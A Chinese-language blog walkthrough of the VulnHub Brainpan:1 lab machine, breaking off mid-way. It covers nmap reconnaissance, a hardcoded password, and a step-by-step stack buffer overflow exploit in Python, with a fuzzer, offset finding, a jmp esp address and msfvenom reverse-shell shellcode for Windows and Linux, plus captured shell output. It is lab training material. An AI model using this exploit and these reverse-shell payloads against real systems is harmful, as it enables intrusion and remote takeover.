vulnhub靶机渗透[brainpan-1]

Posted on Edited on In Views: Word count in article: 4.2k Reading time ≈ 15 mins.

名称

名称:Brainpan:1
发布日期:2013年3月20日

下载

  • Download (Mirror): https://download.vulnhub.com/brainpan/Brainpan.zip
  • Download (Torrent): https://download.vulnhub.com/brainpan/Brainpan.zip.torrent

描述

1
2
3
4
5
6
7
8
 _               _                         
| |__  _ __ __ _(_)_ __  _ __   __ _ _ __  
| '_ \| '__/ _` | | '_ \| '_ \ / _` | '_ \ 
| |_) | | | (_| | | | | | |_) | (_| | | | |
|_.__/|_|  \__,_|_|_| |_| .__/ \__,_|_| |_|
                        |_|                
                            by superkojiman  
                 http://www.techorganic.com

免责声明

使用此虚拟机,即表示您同意,在任何情况下概不负责任何损失或损害,包括但不限于间接或随之而来的损失或损害,或任何损失或损害因使用引起的或与使用有关的数据或利润损失该软件。
TL; DR:如果发生坏事,这不是我的错。

设定

Brainpan经过测试,发现可在以下虚拟机监控程序上工作:
-VMware Player 5.0.1
-VMWare Fusion 5.0
-VirtualBox 4.2.8
将Brainpan导入首选的虚拟机监控程序并配置网络根据需要进行设置。它会通过DHCP获取IP地址,但是建议在NAT内运行它,或者仅对主机操作系统可见,因为它容易受到攻击。

资料来源:Brainpan.zip/readme.txt

1
MD5(brainpan.ova)= fc0f163220b9884df5dcc9cdc45361e4

资料来源:Brainpan.zip/md5.txtVulnHub独家!

信息收集

nmap扫一顿

1
2
3
4
5
6
7
8
9
root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.115
Host is up (0.00042s latency).
MAC Address: 08:00:27:DE:BA:CA (Oracle VirtualBox virtual NIC)

root@kali:~# nmap -p- -v -Pn -sV 192.168.56.115
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)

访问一下看看是什么东西:

扫一下目录看看

在bin目录中有一个二进制文件?

将这个exe文件下载下来,然后用ollydbug工具调试

调试之前,先分析下brainpan.exe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
root@kali:~/vulnhub/brainpan1# file brainpan.exe 
brainpan.exe: PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
root@kali:~/vulnhub/brainpan1# strings brainpan.exe 
!This program cannot be run in DOS mode.
.text
`.data
.rdata
@.bss
.idata
[^_]
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
AAAA
[^_]
[get_reply] s = [%s]
[get_reply] copied %d bytes to buffer
shitstorm
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|
[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              
                          >> 
                          ACCESS DENIED
                          ACCESS GRANTED
[+] initializing winsock...
[!] winsock init failed: %d
done.
[!] could not create socket: %d
[+] server socket created.
[!] bind failed: %d
[+] bind done on port %d
[+] waiting for connections.
[+] received connection.
[+] check is %d
[!] accept failed: %d
[+] cleaning up.
-LIBGCCW32-EH-3-SJLJ-GTHR-MINGW32
w32_sharedptr->size == sizeof(W32_EH_SHARED)
../../gcc-3.4.5/gcc/config/i386/w32-shared-ptr.c
GetAtomNameA (atom, s, sizeof(s)) != 0
AddAtomA
ExitProcess
FindAtomA
GetAtomNameA
SetUnhandledExceptionFilter
__getmainargs
__p__environ
__p__fmode
__set_app_type
_assert
_cexit
_iob
_onexit
_setmode
abort
atexit
free
malloc
memset
printf
signal
strcmp
strcpy
strlen
太多了省略。。。

这里有几个很重要:

  • 这个brainpan.exe看起来与端口9999上的侦听过程相同
  • shitstorm 看起来像密码
  • strcpy 可能是缓冲区溢出攻击向量

显然,应该尝试可能的密码shitstorm。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@kali:~# nc 192.168.56.115 9999
_|                            _|                                        
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|  
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|                          
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD                              

                          >> shitstorm
                          ACCESS GRANTED

返回。
嗯…如何检查strcpy函数。
虽然有适用于Linux的Evan的Debugger和Immunity Debugger(通过wine执行),但我选择在Windows环境中将Immunity Debugger用于“windozy”类型的任务。

免责声明:对于那些已经知道如何执行简单的strcpy缓冲区溢出的人,可以快速进入下一节,因为这本身就很冗长且“用户友好”。选择为每个步骤包括大量的模糊测试代码和详细信息,以便对这种攻击媒介不熟悉的任何人都可以轻松学习并希望了解该过程。

是时候使用快速模糊器来看看是否可以获取导致段错误的输入。这是经常使用的一些代码,并在进行过程中使用shellcode和register进行修改。简单,有效。

etfuzz.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import sys,socket
 
victim = '192.168.56.115'
port = 9999
 
junk = "\x41" * 1000
 
payload = junk 
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  print "[-] Connecting to " + str(victim)
  s.connect((victim, port))
  s.recv(1024)
 
  # Send payload 
  print "[-] Sending payload.... ",
  s.send(payload)
  print "Done"
 
except:
  print "[-] Unable to connect to " + str(victim)
  sys.exit(0)

是时候运行brainpan.exe并使用Immunity Debugger附加到进程。在Windows机器上侦听该进程的情况下,在端口9999上放置1000个模糊测试(\x41),看看是否遇到段错误。

1
2
3
C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload....  Done
1
2
3
4
5
6
7
8
C:\Users\HASEE\Desktop\brainpan1>brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
[+] received connection.
[get_reply] s = [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(_]
[get_reply] copied 1003 bytes to buffer

AM!造成了我们想要的段错误,所见,已经成功地使用模糊A覆盖了eip。是时候控制自己,享受一些乐趣了。
下一步,需要多少字节来填充缓冲区以使eip?使用Metasploit的工具进行此活动。创建一个模式作为开始。

1
2
root@kali:~/vulnhub/brainpan1# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

将其添加到模糊测试脚本etfuzz.py中,用模式输出替换掉A的垃圾数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import sys,socket
 
victim = '192.168.43.98'
port = 9999
 
junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
 
payload = junk 
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  print "[-] Connecting to " + str(victim)
  s.connect((victim, port))
  s.recv(1024)
 
  # Send payload 
  print "[-] Sending payload.... ",
  s.send(payload)
  print "Done"
 
except:
  print "[-] Unable to connect to " + str(victim)
  sys.exit(0)

下一步。重新启动brainpan.exe进程,重新附加到进程,然后将模糊测试脚本发送给侦听器。

1
2
3
C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload....  Done
1
2
3
4
5
6
7
8
C:\Users\HASEE\Desktop\brainpan1>brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[+] bind done on port 9999
[+] waiting for connections.
[+] received connection.
[get_reply] s = [Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B(_]
[get_reply] copied 1003 bytes to buffer

再次成功地覆盖了eip。记下指令指针地址35724134,将其推入Metasploit的模式偏移工具中,这将提供为控制eip而需要发送到缓冲区的字节数。

1
2
root@kali:~/vulnhub/brainpan1# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
[*] Exact match at offset 524

知道只需要524字节的“垃圾数据”就可以成为eip。相应地编辑模糊测试器,看看是否可以用某些B(\x42)成功覆盖eip。重新运行,重新连接并启动模糊测试器。

瞧!如所见,已成功用4个字节的B覆盖了eip。下一个是什么?接下来,看看是否可以将自己的代码放入esp中。如果可以将代码放入esp,将查找名为jmp esp的函数调用,告诉eip指向esp,从而能够执行存储在esp中的恶意代码。编辑模糊器,使其在esp中包含一堆C(\x43),并查看是否有足够的空间容纳潜在的Shellcode。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import sys,socket
 
victim = '192.168.43.98'
port = 9999
 
junk = "\x41" * 524
eip = "\x42" * 4
shellcode = "\x43" * 500
 
payload = junk + eip + shellcode
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  print "[-] Connecting to " + str(victim)
  s.connect((victim, port))
  s.recv(1024)
 
  # Send payload 
  print "[-] Sending payload.... ",
  s.send(payload)
  print "Done"
 
except:
  print "[-] Unable to connect to " + str(victim)
  sys.exit(0)

正如上面看到的,已经成功地用大量C填充了esp,这使知道有一些可用于放置shellcode的区域。让看看是否可以找到jmp esp函数的地址。在Immunity Debugger中,使用ctrl-f并输入搜索jmp esp。如所见,第一个jmp esp地址是311712F3。

下一步,生成一些shellcode,以测试概念验证(PoC)是否有效。由于要测试的PoC框是一个windoZe机器,因此将使用msfvenom生成一个简单的Windows reverse shell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 R -e x86/shikata_ga_nai -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xba\x3a\x75\x8a\xdd\xd9\xed\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x52\x31\x53\x12\x03\x53\x12\x83\xd1\x89\x68"
buf += b"\x28\xd9\x9a\xef\xd3\x21\x5b\x90\x5a\xc4\x6a\x90\x39"
buf += b"\x8d\xdd\x20\x49\xc3\xd1\xcb\x1f\xf7\x62\xb9\xb7\xf8"
buf += b"\xc3\x74\xee\x37\xd3\x25\xd2\x56\x57\x34\x07\xb8\x66"
buf += b"\xf7\x5a\xb9\xaf\xea\x97\xeb\x78\x60\x05\x1b\x0c\x3c"
buf += b"\x96\x90\x5e\xd0\x9e\x45\x16\xd3\x8f\xd8\x2c\x8a\x0f"
buf += b"\xdb\xe1\xa6\x19\xc3\xe6\x83\xd0\x78\xdc\x78\xe3\xa8"
buf += b"\x2c\x80\x48\x95\x80\x73\x90\xd2\x27\x6c\xe7\x2a\x54"
buf += b"\x11\xf0\xe9\x26\xcd\x75\xe9\x81\x86\x2e\xd5\x30\x4a"
buf += b"\xa8\x9e\x3f\x27\xbe\xf8\x23\xb6\x13\x73\x5f\x33\x92"
buf += b"\x53\xe9\x07\xb1\x77\xb1\xdc\xd8\x2e\x1f\xb2\xe5\x30"
buf += b"\xc0\x6b\x40\x3b\xed\x78\xf9\x66\x7a\x4c\x30\x98\x7a"
buf += b"\xda\x43\xeb\x48\x45\xf8\x63\xe1\x0e\x26\x74\x06\x25"
buf += b"\x9e\xea\xf9\xc6\xdf\x23\x3e\x92\x8f\x5b\x97\x9b\x5b"
buf += b"\x9b\x18\x4e\xcb\xcb\xb6\x21\xac\xbb\x76\x92\x44\xd1"
buf += b"\x78\xcd\x75\xda\x52\x66\x1f\x21\x35\x49\x48\x11\xa3"
buf += b"\x21\x8b\x61\x2a\x09\x02\x87\x46\x7d\x43\x10\xff\xe4"
buf += b"\xce\xea\x9e\xe9\xc4\x97\xa1\x62\xeb\x68\x6f\x83\x86"
buf += b"\x7a\x18\x63\xdd\x20\x8f\x7c\xcb\x4c\x53\xee\x90\x8c"
buf += b"\x1a\x13\x0f\xdb\x4b\xe5\x46\x89\x61\x5c\xf1\xaf\x7b"
buf += b"\x38\x3a\x6b\xa0\xf9\xc5\x72\x25\x45\xe2\x64\xf3\x46"
buf += b"\xae\xd0\xab\x10\x78\x8e\x0d\xcb\xca\x78\xc4\xa0\x84"
buf += b"\xec\x91\x8a\x16\x6a\x9e\xc6\xe0\x92\x2f\xbf\xb4\xad"
buf += b"\x80\x57\x31\xd6\xfc\xc7\xbe\x0d\x45\xf7\xf4\x0f\xec"
buf += b"\x90\x50\xda\xac\xfc\x62\x31\xf2\xf8\xe0\xb3\x8b\xfe"
buf += b"\xf9\xb6\x8e\xbb\xbd\x2b\xe3\xd4\x2b\x4b\x50\xd4\x79"

接下来,让把它们放在一起,payload将如下所示:{junk} {jmp esp地址} {nops + buf}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import sys,socket
 
victim = '192.168.43.98'
port = 9999
 
junk = "\x41" * 524
eip = "\xf3\x12\x17\x31"
buf =  b"\x90" * 13
buf += b"\xba\x3a\x75\x8a\xdd\xd9\xed\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x52\x31\x53\x12\x03\x53\x12\x83\xd1\x89\x68"
buf += b"\x28\xd9\x9a\xef\xd3\x21\x5b\x90\x5a\xc4\x6a\x90\x39"
buf += b"\x8d\xdd\x20\x49\xc3\xd1\xcb\x1f\xf7\x62\xb9\xb7\xf8"
buf += b"\xc3\x74\xee\x37\xd3\x25\xd2\x56\x57\x34\x07\xb8\x66"
buf += b"\xf7\x5a\xb9\xaf\xea\x97\xeb\x78\x60\x05\x1b\x0c\x3c"
buf += b"\x96\x90\x5e\xd0\x9e\x45\x16\xd3\x8f\xd8\x2c\x8a\x0f"
buf += b"\xdb\xe1\xa6\x19\xc3\xe6\x83\xd0\x78\xdc\x78\xe3\xa8"
buf += b"\x2c\x80\x48\x95\x80\x73\x90\xd2\x27\x6c\xe7\x2a\x54"
buf += b"\x11\xf0\xe9\x26\xcd\x75\xe9\x81\x86\x2e\xd5\x30\x4a"
buf += b"\xa8\x9e\x3f\x27\xbe\xf8\x23\xb6\x13\x73\x5f\x33\x92"
buf += b"\x53\xe9\x07\xb1\x77\xb1\xdc\xd8\x2e\x1f\xb2\xe5\x30"
buf += b"\xc0\x6b\x40\x3b\xed\x78\xf9\x66\x7a\x4c\x30\x98\x7a"
buf += b"\xda\x43\xeb\x48\x45\xf8\x63\xe1\x0e\x26\x74\x06\x25"
buf += b"\x9e\xea\xf9\xc6\xdf\x23\x3e\x92\x8f\x5b\x97\x9b\x5b"
buf += b"\x9b\x18\x4e\xcb\xcb\xb6\x21\xac\xbb\x76\x92\x44\xd1"
buf += b"\x78\xcd\x75\xda\x52\x66\x1f\x21\x35\x49\x48\x11\xa3"
buf += b"\x21\x8b\x61\x2a\x09\x02\x87\x46\x7d\x43\x10\xff\xe4"
buf += b"\xce\xea\x9e\xe9\xc4\x97\xa1\x62\xeb\x68\x6f\x83\x86"
buf += b"\x7a\x18\x63\xdd\x20\x8f\x7c\xcb\x4c\x53\xee\x90\x8c"
buf += b"\x1a\x13\x0f\xdb\x4b\xe5\x46\x89\x61\x5c\xf1\xaf\x7b"
buf += b"\x38\x3a\x6b\xa0\xf9\xc5\x72\x25\x45\xe2\x64\xf3\x46"
buf += b"\xae\xd0\xab\x10\x78\x8e\x0d\xcb\xca\x78\xc4\xa0\x84"
buf += b"\xec\x91\x8a\x16\x6a\x9e\xc6\xe0\x92\x2f\xbf\xb4\xad"
buf += b"\x80\x57\x31\xd6\xfc\xc7\xbe\x0d\x45\xf7\xf4\x0f\xec"
buf += b"\x90\x50\xda\xac\xfc\x62\x31\xf2\xf8\xe0\xb3\x8b\xfe"
buf += b"\xf9\xb6\x8e\xbb\xbd\x2b\xe3\xd4\x2b\x4b\x50\xd4\x79"
 
payload = junk + eip + buf
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
try:
  print "[-] Connecting to " + str(victim)
  s.connect((victim, port))
  s.recv(1024)
 
  # Send payload 
  print "[-] Sending payload.... ",
  s.send(payload)
  print "Done"
 
except:
  print "[-] Unable to connect to " + str(victim)
  sys.exit(0)

启动brainpan.exe程序,在端口443上创建netcat侦听器,然后测试一下PoC代码。

1
2
3
C:\Users\HASEE\Desktop\brainpan1>python etfuzz.py
[-] Connecting to 192.168.43.98
[-] Sending payload....  Done
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@kali:~# nc -lvp 443
listening on [any] 443 ...
192.168.56.1: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.1] 18602
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ����

C:\Users\HASEE\Desktop\brainpan1>chcp 65001
chcp 65001
Active code page: 65001

C:\Users\HASEE\Desktop\brainpan1>whoami  
whoami
iz94tylsq69z\hasee

C:\Users\HASEE\Desktop\brainpan1>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 7A49-F084

 Directory of C:\Users\HASEE\Desktop\brainpan1

2020/02/01  01:21    <DIR>          .
2020/02/01  01:21    <DIR>          ..
2020/01/31  20:48            21,190 brainpan.exe
2020/02/01  01:21             2,166 etfuzz.py
               2 File(s)         23,356 bytes
               2 Dir(s)  151,135,014,912 bytes free

C:\Users\HASEE\Desktop\brainpan1>net user
net user

User accounts for \\IZ94TYLSQ69Z

-------------------------------------------------------------------------------
Administrator            ASPNET                   DefaultAccount           
Guest                    HASEE                    WDAGUtilityAccount
  • 注意:这个shell是测试电脑的shell,如果乱码,输入chcp 65001就不会乱码了

getshell

好东西…。现在有一个reverse TCP连接到我们的Windows计算机。是时候创建一个Linux reverse shell了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.56.102 LPORT=443 R -e x86/alpha_upper -b '\x00' -f python
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_upper
x86/alpha_upper succeeded with size 205 (iteration=0)
x86/alpha_upper chosen with final size 205
Payload size: 205 bytes
Final size of python file: 1007 bytes
buf =  b""
buf += b"\x89\xe5\xd9\xcb\xd9\x75\xf4\x58\x50\x59\x49\x49\x49"
buf += b"\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33"
buf += b"\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41"
buf += b"\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41"
buf += b"\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a"
buf += b"\x4a\x49\x30\x31\x49\x4b\x5a\x57\x4b\x53\x31\x43\x47"
buf += b"\x33\x46\x33\x53\x5a\x53\x32\x4b\x39\x4b\x51\x38\x30"
buf += b"\x52\x46\x58\x4d\x4d\x50\x4a\x33\x36\x39\x48\x30\x37"
buf += b"\x4f\x58\x4d\x4d\x50\x30\x49\x44\x39\x5a\x59\x35\x38"
buf += b"\x49\x50\x59\x38\x30\x38\x45\x36\x32\x48\x44\x42\x33"
buf += b"\x30\x35\x51\x4f\x4b\x4b\x39\x4b\x51\x38\x30\x42\x46"
buf += b"\x56\x30\x36\x31\x30\x53\x4f\x43\x33\x33\x4c\x49\x4b"
buf += b"\x51\x38\x4d\x4d\x50\x50\x52\x43\x58\x52\x4e\x46\x4f"
buf += b"\x44\x33\x52\x48\x53\x58\x36\x4f\x46\x4f\x32\x42\x53"
buf += b"\x59\x4d\x59\x4a\x43\x31\x42\x31\x43\x4c\x49\x4d\x31"
buf += b"\x38\x30\x34\x4b\x58\x4d\x4b\x30\x41\x41"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
